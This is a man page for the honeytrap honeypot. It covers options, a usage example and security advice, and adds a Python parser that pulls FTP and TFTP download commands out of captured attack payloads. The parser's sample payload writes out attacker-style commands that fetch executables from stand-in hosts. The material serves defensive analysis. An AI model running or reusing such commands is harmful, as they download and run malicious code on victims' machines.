Section: Maintenance Commands (8)
Updated: 17 June 2006
NAME
honeytrap - trap attacks against tcp services

SYNOPSIS
honeytrap [ -Dpmv ] [ -i interface ] [ -a ip_address ] [ -l listen_timeout ] [ -r read_timeout ] [ -t loglevel ] [ -L logfile ] [ -P pidfile ] [ -C configfile ] [ expression ]
DESCRIPTION
honeytrap is a network security tool written to observe attacks against TCP services. As a low-interaction honeypot, it collects information about known and unknown network-based attacks. It starts server processes dynamically at the time an incoming connection request arrives, so it can respond to most network-based attacks without a service having to be configured in advance. Observed data can be processed by plugins for automatic analysis.
All data submitted to honeytrap can be dumped to the filesystem for further investigation. Attacks can be parsed automatically for download commands. Plugins enable honeytrap to recognize FTP and TFTP commands and to download the referenced online resources automatically.
honeytrap must be run by root or installed setuid to root, in order to bind to privileged ports. Always use the -u and -g flags to drop privileges early and switch to an unprivileged user and group as soon as possible.
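The following is an added example, not code from honeytrap or its plugins: a small Python parser of the kind an analyst could run over a dumped attack payload to pull out the FTP and TFTP download commands the description refers to. The command patterns it recognizes and the sample payload are assumptions constructed for the example; it only extracts the commands and never fetches anything.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class DownloadCommand:
    proto: str      # "tftp" or "ftp"
    host: str       # IP or hostname the attacker's command points at
    filename: str   # remote file the command tries to retrieve

# Assumed patterns (not honeytrap's own): a one-line "tftp [-i] HOST get FILE",
# and a scripted FTP session built from "open HOST [PORT]" followed by "get FILE".
TFTP_RE = re.compile(
    rb"tftp(?:\.exe)?\s+(?:-i\s+)?(?P<host>[\w.\-]+)\s+get\s+(?P<file>[\w.\-\\/]+)",
    re.IGNORECASE,
)
FTP_OPEN_RE = re.compile(rb"\bopen\s+(?P<host>[\w.\-]+)(?:\s+\d+)?", re.IGNORECASE)
FTP_GET_RE = re.compile(rb"\b(?:get|mget)\s+(?P<file>[\w.\-\\/]+)", re.IGNORECASE)

def extract_download_commands(payload: bytes) -> list[DownloadCommand]:
    """Return every FTP/TFTP download command found in a raw attack payload."""
    found = [DownloadCommand("tftp", m["host"].decode(), m["file"].decode())
             for m in TFTP_RE.finditer(payload)]
    # Blank out the TFTP commands so their "get FILE" is not also counted as an FTP get.
    stripped = TFTP_RE.sub(b" ", payload)
    opens = list(FTP_OPEN_RE.finditer(stripped))
    for i, o in enumerate(opens):
        # Each "open HOST" owns the gets that follow it, up to the next "open".
        end = opens[i + 1].start() if i + 1 < len(opens) else len(stripped)
        for g in FTP_GET_RE.finditer(stripped, o.end(), end):
            found.append(DownloadCommand("ftp", o["host"].decode(), g["file"].decode()))
    return found

# Constructed sample: shellcode residue followed by a TFTP fetch and a scripted FTP
# session, using RFC 5737 documentation addresses.
SAMPLE_PAYLOAD = (
    b"\x90\x90\x90cmd /c tftp -i 192.0.2.10 GET update.exe & "
    b"echo open 198.51.100.7 21 > s.txt & echo user x x >> s.txt & "
    b"echo get a.exe >> s.txt & echo bye >> s.txt & ftp -s:s.txt\r\n"
)

if __name__ == "__main__":
    for cmd in extract_download_commands(SAMPLE_PAYLOAD):
        print(f"{cmd.proto}: {cmd.filename} from {cmd.host}")
```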
EXAMPLES
Read the configuration from /etc/honeytrap.conf, run on eth0 as nobody/nogroup and log to /var/log/honeytrap.log. Set the log level to LOG_NOISY (5) and stay in the foreground (-D):

    honeytrap -C /etc/honeytrap.conf -i eth0 -u nobody -g nogroup -L /var/log/honeytrap.log -t 5 -D
SECURITY
As a honeypot, honeytrap is exposed to attacks that might compromise the software itself. Running it in a hardened and secured environment is a good idea. Linking against a stack protection library might also improve security. The configure script supports the electric fence malloc debugger. Use it.
SEE ALSO
bpf(4), pcap(3), tcp(7).
AUTHOR
This version of honeytrap was written by Tillmann Werner.

BUGS
Please report any bugs to honeytrap-at-users.sourceforge.net.